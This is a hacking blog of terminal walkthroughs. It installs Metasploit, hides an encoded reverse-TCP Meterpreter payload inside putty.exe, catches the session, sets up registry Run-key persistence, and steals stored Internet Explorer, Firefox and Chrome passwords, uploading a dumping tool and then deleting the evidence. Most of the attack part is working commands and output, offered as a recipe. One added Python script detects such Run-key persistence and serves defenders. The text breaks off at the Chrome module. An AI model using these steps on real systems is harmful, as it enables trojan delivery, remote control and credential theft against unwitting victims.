Blog

My weblog, for lack of a better word…
Here you can find stuff about stuff, things about things and basically anything about everything.
Nothing here has a date, since it's mostly snippets of code and how to use certain applications and their options (arguments).

Mostly stuff about hacking though :P

Disclaimer: read the Fineprint


Installing Metasploit on Debian Jessie

ztik@unknownhost:~$ apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Note, selecting 'xtightvncviewer' instead of 'vncviewer'
build-essential is already the newest version.
zlib1g-dev is already the newest version.
zlib1g-dev set to manually installed.
openjdk-7-jre is already the newest version.
openjdk-7-jre set to manually installed.
libssl-dev is already the newest version.
The following extra packages will be installed:
	<snip>you get the idea here</snip>
Processing triggers for libc-bin (2.19-18+deb8u7) ...
Processing triggers for systemd (215-17+deb8u6) ...
ztik@unknownhost:~$ git clone git://github.com/sstephenson/rbenv.git .rbenv
Cloning into '.rbenv'...
remote: Counting objects: 2595, done.
remote: Total 2595 (delta 0), reused 0 (delta 0), pack-reused 2595
Receiving objects: 100% (2595/2595), 475.80 KiB | 0 bytes/s, done.
Resolving deltas: 100% (1628/1628), done.
Checking connectivity... done.
ztik@unknownhost:~$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
ztik@unknownhost:~$ echo 'eval "$(rbenv init -)"' >> ~/.bashrc
ztik@unknownhost:~$ exec $SHELL 
ztik@unknownhost:~$ git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
Cloning into '/home/ztik/.rbenv/plugins/ruby-build'...
remote: Counting objects: 7400, done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 7400 (delta 1), reused 0 (delta 0), pack-reused 7392
Receiving objects: 100% (7400/7400), 1.45 MiB | 1.30 MiB/s, done.
Resolving deltas: 100% (4483/4483), done.
Checking connectivity... done.
ztik@unknownhost:~$ echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
ztik@unknownhost:~$ exec $SHELL 
ztik@unknownhost:~$ rbenv install 2.3.3
Downloading ruby-2.3.3.tar.bz2...
-> https://cache.ruby-lang.org/pub/ruby/2.3/ruby-2.3.3.tar.bz2
Installing ruby-2.3.3...
Installed ruby-2.3.3 to /home/ztik/.rbenv/versions/2.3.3
 
ztik@unknownhost:~$ rbenv global 2.3.3
ztik@unknownhost:/opt/metasploit-framework$ ruby -v
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-linux]
ztik@unknownhost:~$ su postgres
postgres@unknownhost:/home/ztik$ createuser -P -S MSF -R -D
Enter password for new role: 
Enter it again: 
postgres@unknownhost:/home/ztik$ createdb -O MSF MSF
postgres@unknownhost:/home/ztik$ exit
exit
ztik@unknownhost:~$ cd /opt
ztik@unknownhost:/opt$ git clone https://github.com/rapid7/metasploit-framework.git
Cloning into 'metasploit-framework'...
remote: Counting objects: 388973, done.
remote: Compressing objects: 100% (105/105), done.
remote: Total 388973 (delta 47), reused 0 (delta 0), pack-reused 388867
Receiving objects: 100% (388973/388973), 288.37 MiB | 5.71 MiB/s, done.
Resolving deltas: 100% (282540/282540), done.
Checking connectivity... done.
Checking out files: 100% (7848/7848), done.
ztik@unknownhost:/opt$ chown -R root /opt/metasploit-framework
ztik@unknownhost:/opt$ cd metasploit-framework
ztik@unknownhost:/opt/metasploit-framework$ gem install bundler
Did you know that maintaining and improving Bundler and RubyGems.org costs more than $25,000 USD every month? Help us keep the gem ecosystem free for everyone by joining the hundreds of companies and individuals who help cover these costs: https://ruby.to/support-bundler
Successfully installed bundler-1.14.4
Parsing documentation for bundler-1.14.4
Done installing documentation for bundler after 9 seconds
1 gem installed
ztik@unknownhost:/opt/metasploit-framework$ bundle install
Fetching gem metadata from https://rubygems.org/.............
Fetching version metadata from https://rubygems.org/...
Fetching dependency metadata from https://rubygems.org/..
Installing rake 12.0.0
Installing i18n 0.8.0
Installing json 1.8.6 with native extensions
Installing minitest 5.10.1
Installing thread_safe 0.3.5
Installing builder 3.2.3
Installing erubis 2.7.0
Installing mini_portile2 2.1.0
Installing rack 1.6.5
Installing arel 6.0.4
Installing public_suffix 2.0.5
Installing ffi 1.9.17 with native extensions
Installing contracts 0.14.0
Installing gherkin 4.0.0
Installing cucumber-wire 0.0.1
Installing diff-lcs 1.3
Installing multi_json 1.12.1
Installing multi_test 0.1.2
Installing rspec-support 3.5.0
Installing thor 0.19.4
Installing bcrypt 3.1.11 with native extensions
Installing bit-struct 0.15.0
Installing mime-types-data 3.2016.0521
Installing coderay 1.1.1
Installing docile 1.1.5
Installing multipart-post 2.0.0
Installing filesize 0.1.1
Installing fivemat 1.3.2
Installing rkelly-remix 0.0.7
Installing metasm 1.0.2
Installing pg 0.19.0 with native extensions
Installing pg_array_parser 0.0.9 with native extensions
Installing rubyntlm 0.6.1
Installing rubyzip 1.2.1
Installing metasploit-payloads 1.2.14
Installing metasploit_payloads-mettle 0.1.7
Installing msgpack 1.0.3 with native extensions
Installing nessus_rest 0.1.6
Installing net-ssh 4.0.1
Installing network_interface 0.0.1 with native extensions
Installing openssl-ccm 1.2.1
Installing openvas-omp 0.0.4
Installing pcaprub 0.12.4 with native extensions
Installing patch_finder 1.0.2
Installing rb-readline 0.5.4
Installing redcarpet 3.4.0 with native extensions
Installing rex-text 0.2.11
Installing rex-core 0.1.7
Installing rex-struct2 0.1.0
Installing rex-java 0.1.3
Installing rex-registry 0.1.1
Installing robots 0.10.1
Installing sqlite3 1.3.13 with native extensions
Installing sshkey 1.9.0
Installing windows_error 0.1.0
Installing method_source 0.8.2
Installing slop 3.6.0
Installing simplecov-html 0.10.0
Installing timecop 0.8.1
Installing yard 0.9.8
Using bundler 1.14.4
Installing tzinfo 1.2.2
Installing nokogiri 1.7.0.1 with native extensions
Installing rack-test 0.6.3
Installing addressable 2.5.0
Installing childprocess 0.5.9
Installing cucumber-core 1.5.0
Installing rspec-expectations 3.5.0
Installing rspec-core 3.5.4
Installing rspec-mocks 3.5.0
Installing mime-types 3.1
Installing faraday 0.11.0
Installing jsobfu 0.4.2
Installing packetfu 1.1.13.pre
Installing rex-arch 0.1.4
Installing rex-mime 0.1.3
Installing rex-ole 0.1.4
Installing rex-random_identifier 0.1.1
Installing rex-zip 0.1.1
Installing rex-rop_builder 0.1.1
Installing rex-socket 0.1.3
Installing pry 0.10.4
Installing simplecov 0.13.0
Installing activesupport 4.2.7.1
Installing tzinfo-data 1.2016.10
Installing loofah 2.0.3
Installing xpath 2.0.0
Installing recog 2.1.4
Installing cucumber 2.4.0
Installing sawyer 0.8.1
Installing rex-bin_tools 0.1.1
Installing rex-encoder 0.1.2
Installing rex-nop 0.1.0
Installing rex-powershell 0.1.69
Installing rex-sslscan 0.1.2
Installing rails-deprecated_sanitizer 1.0.3
Installing activemodel 4.2.7.1
Installing factory_girl 4.8.0
Installing shoulda-matchers 3.1.1
Installing rails-html-sanitizer 1.0.3
Installing capybara 2.12.1
Installing aruba 0.14.2
Installing octokit 4.6.2
Installing rex-exploitation 0.1.10
Installing rails-dom-testing 1.0.8
Installing activerecord 4.2.7.1
Installing actionview 4.2.7.1
Installing arel-helpers 2.3.0
Installing postgres_ext 3.0.0
Installing actionpack 4.2.7.1
Installing railties 4.2.7.1
Installing cucumber-rails 1.4.5
Installing factory_girl_rails 4.8.0
Installing metasploit-concern 2.0.3
Installing metasploit-model 2.0.3
Installing rspec-rails 3.5.2
Installing metasploit_data_models 2.0.14
Installing metasploit-credential 2.0.8
Using metasploit-framework 4.13.25 from source at `.`
Bundle complete! 14 Gemfile dependencies, 119 gems now installed.
Use `bundle show [gemname]` to see where a bundled gem is installed.
Post-install message from aruba:
Use on ruby 1.8.7
* Make sure you add something like that to your `Gemfile`. Otherwise you will
  get cucumber > 2 and this will fail on ruby 1.8.7
 
  gem 'cucumber', '~> 1.3.20'
 
With aruba >= 1.0 there will be breaking changes. Make sure to read https://github.com/cucumber/aruba/blob/master/History.md for 1.0.0
Post-install message from openssl-ccm:
Thanks for installing!
Post-install message from yard:
--------------------------------------------------------------------------------
As of YARD v0.9.2:
 
RubyGems "--document=yri,yard" hooks are now supported. You can auto-configure
YARD to automatically build the yri index for installed gems by typing:
 
    $ yard config --gem-install-yri
 
See `yard config --help` for more information on RubyGems install hooks.
 
You can also add the following to your .gemspec to have YARD document your gem
on install:
 
    spec.metadata["yard.run"] = "yri" # use "yard" to build full HTML docs.
 
--------------------------------------------------------------------------------
ztik@unknownhost:/opt/metasploit-framework$ bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done' 
ztik@unknownhost:/opt/metasploit-framework$ ls /usr/local/bin/msf* -al
lrwxrwxrwx 1 root root 36 Feb 19 21:47 /usr/local/bin/msfconsole -> /opt/metasploit-framework/msfconsole
lrwxrwxrwx 1 root root 30 Feb 19 21:47 /usr/local/bin/msfd -> /opt/metasploit-framework/msfd
lrwxrwxrwx 1 root root 32 Feb 19 21:47 /usr/local/bin/msfrpc -> /opt/metasploit-framework/msfrpc
lrwxrwxrwx 1 root root 33 Feb 19 21:47 /usr/local/bin/msfrpcd -> /opt/metasploit-framework/msfrpcd
lrwxrwxrwx 1 root root 35 Feb 19 21:47 /usr/local/bin/msfupdate -> /opt/metasploit-framework/msfupdate
lrwxrwxrwx 1 root root 34 Feb 19 21:47 /usr/local/bin/msfvenom -> /opt/metasploit-framework/msfvenom
ztik@unknownhost:/opt/metasploit-framework$ updatedb
updatedb: can not open a temporary file for `/var/lib/mlocate/mlocate.db'
ztik@unknownhost:/opt/metasploit-framework$ cd config
ztik@unknownhost:/opt/metasploit-framework/config$ cp database.yml.example database.yml
ztik@unknownhost:/opt/metasploit-framework/config$ nano database.yml
 
production: &pgsql
  adapter: postgresql
  database: <insert database created during postgres installation, MSF in this example>
  username: <insert username created during postgres user creation, MSF in this example>
  password: <insert password created during postgres user creation>
  host: localhost
  port: 5432
  pool: 75
  timeout: 1
 
ztik@unknownhost:/opt/metasploit-framework/config$ sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
ztik@unknownhost:/opt/metasploit-framework$ source /etc/profile
ztik@unknownhost:/opt/metasploit-framework$ cd ~
ztik@unknownhost:~$ msfconsole
 
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+
 
 
       =[ metasploit v4.13.25-dev-6470202                 ]
+ -- --=[ 1623 exploits - 925 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf >

Updating Metasploit

ztik@unknownhost:~$ msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
 
[*] Checking for updates via git
[*] Note: Updating from bleeding edge
HEAD is now at 6470202 Bump version of framework to 4.13.25
Already on 'master'
Your branch is up-to-date with 'origin/master'.
Already up-to-date.
[*] Updating gems...
Using rake 12.0.0
Using i18n 0.8.0
Using json 1.8.6
Using minitest 5.10.1
Using thread_safe 0.3.5
Using builder 3.2.3
Using erubis 2.7.0
Using mini_portile2 2.1.0
Using rack 1.6.5
Using arel 6.0.4
Using public_suffix 2.0.5
Using ffi 1.9.17
Using contracts 0.14.0
Using gherkin 4.0.0
Using cucumber-wire 0.0.1
Using diff-lcs 1.3
Using multi_json 1.12.1
Using multi_test 0.1.2
Using rspec-support 3.5.0
Using thor 0.19.4
Using bcrypt 3.1.11
Using bit-struct 0.15.0
Using mime-types-data 3.2016.0521
Using coderay 1.1.1
Using docile 1.1.5
Using multipart-post 2.0.0
Using filesize 0.1.1
Using fivemat 1.3.2
Using rkelly-remix 0.0.7
Using metasm 1.0.2
Using pg 0.19.0
Using pg_array_parser 0.0.9
Using rubyntlm 0.6.1
Using rubyzip 1.2.1
Using metasploit-payloads 1.2.14
Using metasploit_payloads-mettle 0.1.7
Using msgpack 1.0.3
Using nessus_rest 0.1.6
Using net-ssh 4.0.1
Using network_interface 0.0.1
Using openssl-ccm 1.2.1
Using openvas-omp 0.0.4
Using pcaprub 0.12.4
Using patch_finder 1.0.2
Using rb-readline 0.5.4
Using redcarpet 3.4.0
Using rex-text 0.2.11
Using rex-core 0.1.7
Using rex-struct2 0.1.0
Using rex-java 0.1.3
Using rex-registry 0.1.1
Using robots 0.10.1
Using sqlite3 1.3.13
Using sshkey 1.9.0
Using windows_error 0.1.0
Using method_source 0.8.2
Using slop 3.6.0
Using simplecov-html 0.10.0
Using timecop 0.8.1
Using yard 0.9.8
Using bundler 1.14.4
Using tzinfo 1.2.2
Using nokogiri 1.7.0.1
Using rack-test 0.6.3
Using addressable 2.5.0
Using childprocess 0.5.9
Using cucumber-core 1.5.0
Using rspec-expectations 3.5.0
Using rspec-core 3.5.4
Using rspec-mocks 3.5.0
Using mime-types 3.1
Using faraday 0.11.0
Using jsobfu 0.4.2
Using packetfu 1.1.13.pre
Using rex-arch 0.1.4
Using rex-mime 0.1.3
Using rex-ole 0.1.4
Using rex-random_identifier 0.1.1
Using rex-zip 0.1.1
Using rex-rop_builder 0.1.1
Using rex-socket 0.1.3
Using pry 0.10.4
Using simplecov 0.13.0
Using activesupport 4.2.7.1
Using tzinfo-data 1.2016.10
Using loofah 2.0.3
Using xpath 2.0.0
Using recog 2.1.4
Using cucumber 2.4.0
Using sawyer 0.8.1
Using rex-bin_tools 0.1.1
Using rex-encoder 0.1.2
Using rex-nop 0.1.0
Using rex-powershell 0.1.69
Using rex-sslscan 0.1.2
Using rails-deprecated_sanitizer 1.0.3
Using activemodel 4.2.7.1
Using factory_girl 4.8.0
Using shoulda-matchers 3.1.1
Using rails-html-sanitizer 1.0.3
Using capybara 2.12.1
Using aruba 0.14.2
Using octokit 4.6.2
Using rex-exploitation 0.1.10
Using rails-dom-testing 1.0.8
Using activerecord 4.2.7.1
Using actionview 4.2.7.1
Using arel-helpers 2.3.0
Using postgres_ext 3.0.0
Using actionpack 4.2.7.1
Using railties 4.2.7.1
Using cucumber-rails 1.4.5
Using factory_girl_rails 4.8.0
Using metasploit-concern 2.0.3
Using metasploit-model 2.0.3
Using rspec-rails 3.5.2
Using metasploit_data_models 2.0.14
Using metasploit-credential 2.0.8
Using metasploit-framework 4.13.25 from source at `.`
Bundle complete! 14 Gemfile dependencies, 119 gems now installed.
Use `bundle show [gemname]` to see where a bundled gem is installed.

Add encoded Meterpreter payload to an executable

ztik@unknownhost:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=31415 -f raw -e x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -x /home/ztik/putty.exe -f exe -o /home/ztik/payload.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 6 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai chosen with final size 495
Payload size: 495 bytes
 
Found 1 compatible encoders
Attempting to encode payload with 6 iterations of x86/countdown
x86/countdown succeeded with size 513 (iteration=0)
x86/countdown succeeded with size 531 (iteration=1)
x86/countdown succeeded with size 549 (iteration=2)
x86/countdown succeeded with size 567 (iteration=3)
x86/countdown succeeded with size 585 (iteration=4)
x86/countdown succeeded with size 603 (iteration=5)
x86/countdown chosen with final size 603
Payload size: 603 bytes
 
Found 1 compatible encoders
Attempting to encode payload with 6 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 630 (iteration=0)
x86/shikata_ga_nai succeeded with size 657 (iteration=1)
x86/shikata_ga_nai succeeded with size 684 (iteration=2)
x86/shikata_ga_nai succeeded with size 711 (iteration=3)
x86/shikata_ga_nai succeeded with size 738 (iteration=4)
x86/shikata_ga_nai succeeded with size 765 (iteration=5)
x86/shikata_ga_nai chosen with final size 765
Payload size: 765 bytes
Final size of exe file: 531368 bytes
Saved as: payload.exe
ztik@unknownhost:~$ ls *.exe -al
-rw-r--r-- 1 ztik ztik 531368 Feb 19 22:34 payload.exe
-rw-r--r-- 1 ztik ztik 531368 Feb 29  2016 putty.exe
ztik@unknownhost:~$ chmod +x payload.exe

Starting a handler

ztik@unknownhost:~$ msfconsole
 
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 
 
       =[ metasploit v4.13.25-dev-6470202                 ]
+ -- --=[ 1623 exploits - 925 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(handler) > set LPORT 31415
LPORT => 31415
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on 10.0.2.15:31415
[*] Starting the payload handler...
msf exploit(handler) > 

Have someone run the payload

msf exploit(handler) > 
[*] Sending stage (957487 bytes) to 10.0.2.13
[*] Meterpreter session 1 opened (10.0.2.15:31415 -> 10.0.2.13:55022) at 2017-02-19 23:05:25 +0100
msf exploit(handler) >

Session list

msf exploit(handler) > sessions -l
 
Active sessions
===============
 
  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  ZTIK-PC\ZTiK @ ZTIK-PC  10.0.2.15:31415 -> 10.0.2.13:55022 (10.0.2.13)
 
msf exploit(handler) >

Change active session

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter >

Place active session in background

meterpreter > background
msf exploit(handler) >

Migrate payload to another process

 

Get active system profile

meterpreter > getuid
Server username: ZTIK-PC\ZTiK
meterpreter > 

Persistence script

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/persistence_exe
msf exploit(persistence) > show options
 
Module options (exploit/windows/local/persistence):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     10               yes       Delay (in seconds) for persistent payload to keep reconnecting back.
   EXE_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   PATH                       no        Path to write payload (%TEMP% by default).
   REG_NAME                   no        The name to call registry value for persistence on target host (%RAND% by default).
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)
   VBS_NAME                   no        The filename to use for the VBS persistent script on the target host (%RAND% by default).
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Windows
 
 
msf exploit(persistence) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(persistence) > set LPORT 31415
LPORT => 31415
msf exploit(persistence) > set STARTUP SYSTEM
STARTUP => SYSTEM
 
msf exploit(persistence) > sessions
 
Active sessions
===============
 
  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  ZTIK-PC\ZTiK @ ZTIK-PC  10.0.2.15:31415 -> 10.0.2.13:55457 (10.0.2.13)
 
msf exploit(persistence) > set SESSION 1
SESSION => 1
msf exploit(persistence) > run
 
[*] Running persistent module against ZTIK-PC via session ID: 1
[+] Persistent VBS script written on ZTIK-PC to C:\Users\ZTiK\AppData\Local\Temp\tGkkGC.vbs
[*] Installing as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QsaReFmOL
[+] Installed autorun on ZTIK-PC as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QsaReFmOL
[*] Clean up Meterpreter RC file: /home/ztik/.msf4/logs/persistence/ZTIK-PC_20170219.3748/ZTIK-PC_20170219.3748.rc
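What the persistence module leaves behind, seen from the defender's side: a Run value with a generated name whose data is a .vbs under the user's Temp directory. The following added example (mine, not part of this post or of Metasploit) parses a constructed `reg query` listing of the HKLM and HKCU Run keys and flags entries with those traits. The value name QsaReFmOL and the tGkkGC.vbs path are the ones from the module output above; the other entries in the listing are made up, and the generated-name heuristic is a rough case-switch ratio, an assumption rather than a rule.

```python
"""Triage Run-key autoruns for persistence indicators.

Added example, not part of the original post or of Metasploit. The registry
listing below is constructed in the layout `reg query <key>` prints; the value
name QsaReFmOL and the tGkkGC.vbs path are the ones from the module output
above, the other entries are made up."""
import re

# Constructed sample: what `reg query` prints for both Run keys.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    QsaReFmOL    REG_SZ    C:\Users\ZTiK\AppData\Local\Temp\tGkkGC.vbs

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\ZTiK\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Script hosts and extensions that seldom belong in a legitimate autorun value.
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "rundll32")
SCRIPT_EXTS = (".vbs", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
# User-writable scratch locations; the module above drops its .vbs in %TEMP%.
TEMP_DIRS = (r"\appdata\local\temp", r"\windows\temp", "%temp%", "%tmp%")

VALUE_LINE = re.compile(r"^\s{2,}(\S.*?)\s{2,}(REG_\w+)\s{2,}(.+?)\s*$")


def parse_reg_query(text):
    """Yield (key, value_name, reg_type, data) from `reg query` style output."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # un-indented lines name the key
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key is not None:
            yield key, m.group(1), m.group(2), m.group(3)


def looks_generated(name):
    """Rough heuristic (an assumption, not a rule): letters-only names of 6-12
    characters that switch case on more than half of their character boundaries,
    like QsaReFmOL, are probably generated rather than chosen by a vendor."""
    if not (6 <= len(name) <= 12 and name.isalpha()):
        return False
    switches = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return switches / (len(name) - 1) > 0.5


def suspicious_autoruns(text):
    """Return [(key, value_name, data, reasons)] for entries worth a closer look."""
    findings = []
    for key, name, _reg_type, data in parse_reg_query(text):
        low = data.lower().strip('"')
        reasons = []
        if any(marker in low for marker in TEMP_DIRS):
            reasons.append("runs from a temp directory")
        if low.endswith(SCRIPT_EXTS) or any(host in low for host in SCRIPT_HOSTS):
            reasons.append("launches a script instead of an installed executable")
        if looks_generated(name):
            reasons.append("value name looks generated")
        if reasons:
            findings.append((key, name, data, reasons))
    return findings


if __name__ == "__main__":
    for key, name, data, reasons in suspicious_autoruns(SAMPLE_REG_QUERY):
        print(f"{key}\\{name}\n    {data}\n    -> {'; '.join(reasons)}")
```

On a real host the input would come from `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and the HKCU equivalent (STARTUP SYSTEM writes the HKLM key, STARTUP USER the HKCU one). The "Clean up Meterpreter RC file" line above is also worth knowing on the blue side: the module records every change it made, so the registry value and the script path are the two artifacts to look for.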

Steal Internet Explorer stored passwords

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > wget --referer='http://www.nirsoft.net/utils/internet_explorer_password.html' http://www.nirsoft.net/toolsdownload/iepv.zip
[*] exec: wget --referer='http://www.nirsoft.net/utils/internet_explorer_password.html' http://www.nirsoft.net/toolsdownload/iepv.zip
 
--2017-02-19 23:46:30--  http://www.nirsoft.net/toolsdownload/iepv.zip
Resolving www.nirsoft.net (www.nirsoft.net)... 50.22.232.74
Connecting to www.nirsoft.net (www.nirsoft.net)|50.22.232.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 70610 (69K) [application/zip]
Saving to: ‘iepv.zip’
 
iepv.zip                                             100%
[=======================================================================================================================>]  68.96K   229KB/s   in 0.3s   
 
2017-02-19 23:46:30 (229 KB/s) - ‘iepv.zip’ saved [70610/70610]
 
msf exploit(handler) > unzip iepv.zip
[*] exec: unzip iepv.zip
 
Archive:  iepv.zip
  inflating: iepv.exe                
  inflating: iepv.chm                
  inflating: readme.txt              
  inflating: iepv_sites.txt          
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > upload iepv.exe
[*] uploading  : iepv.exe -> iepv.exe
[*] uploaded   : iepv.exe -> iepv.exe
meterpreter > shell
Process 9192 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Program Files\\Putty>>iepv.exe /stext passwd.txt
iepv.exe /stext passwd.txt
 
C:\Program Files\\Putty>exit
meterpreter > download C:\\Program\ Files\\Puttypasswd.txt /root/passwd.txt       (note the double slash!)
[*] downloading: c:\passwd.txt -> /home/ztik/passwd.txt
[*] downloaded : c:\passwd.txt -> /home/ztik/passwd.txt
meterpreter > rm iepv.exe
meterpreter > rm passwd.txt
meterpreter > background
msf exploit(handler) > cat /home/ztik/passwd.txt
[*] exec: cat /home/ztik/passwd.txt
 
==================================================
Entry Name        : http://nl.facebook.com/
Type              : AutoComplete
Stored In         : Registry
User Name         : myfacebookusername789
Password          : myfacebookpassword987
Password Strength : Medium
==================================================
 
==================================================
Entry Name        : https://login.skype.com/account/login-form
Type              : AutoComplete
Stored In         : Registry
User Name         : myskypeusername678
Password          : myskypepassword876
Password Strength : Strong
==================================================
 
==================================================
Entry Name        : https://www.amazon.com/gp/cart/view.html/ref=ox_huc_proceed_top
Type              : AutoComplete
Stored In         : Registry
User Name         : myamazonusername456
Password          : myamazonpassword654
Password Strength : Strong
==================================================
 
==================================================
Entry Name        : https://www.paypal.com/
Type              : AutoComplete
Stored In         : Registry
User Name         : mypaypalusername123
Password          : mypaypalpassword321
Password Strength : Strong
==================================================
msf exploit(handler) >

Steal Mozilla Firefox stored passwords

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/multi/gather/firefox_creds
msf post(firefox_creds) > show options
 
Module options (post/multi/gather/firefox_creds):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DECRYPT  false            no        Decrypts passwords without third party tools
   SESSION                   yes       The session to run this module on.
 
msf post(firefox_creds) > set SESSION 1
SESSION => 1
msf post(firefox_creds) > run
 
[*] Checking for Firefox profile in: C:\Users\ZTiK\AppData\Roaming\Mozilla\
 
[*] Profile: C:\Users\ZTiK\AppData\Roaming\Mozilla\Firefox\Profiles\7UBJXq5o.default
[+] Downloaded cert8.db: /home/ztik/.msf4/loot/20170220001444_default_10.0.2.13_ff.7UBJXq5o.cert_429837.bin
[+] Downloaded cookies.sqlite: /home/ztik/.msf4/loot/20170220001445_default_10.0.2.13_ff.7UBJXq5o.cook_266771.bin
[+] Downloaded key3.db: /home/ztik/.msf4/loot/20170220001447_default_10.0.2.13_ff.7UBJXq5o.key3_505789.bin
[+] Downloaded logins.json: /home/ztik/.msf4/loot/20170220001447_default_10.0.2.13_ff.7UBJXq5o.logi_786367.bin
 
[*] Post module execution completed

Steal Google Chrome stored passwords

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_chrome
msf post(enum_chrome) > show options
 
Module options (post/windows/gather/enum_chrome):
 
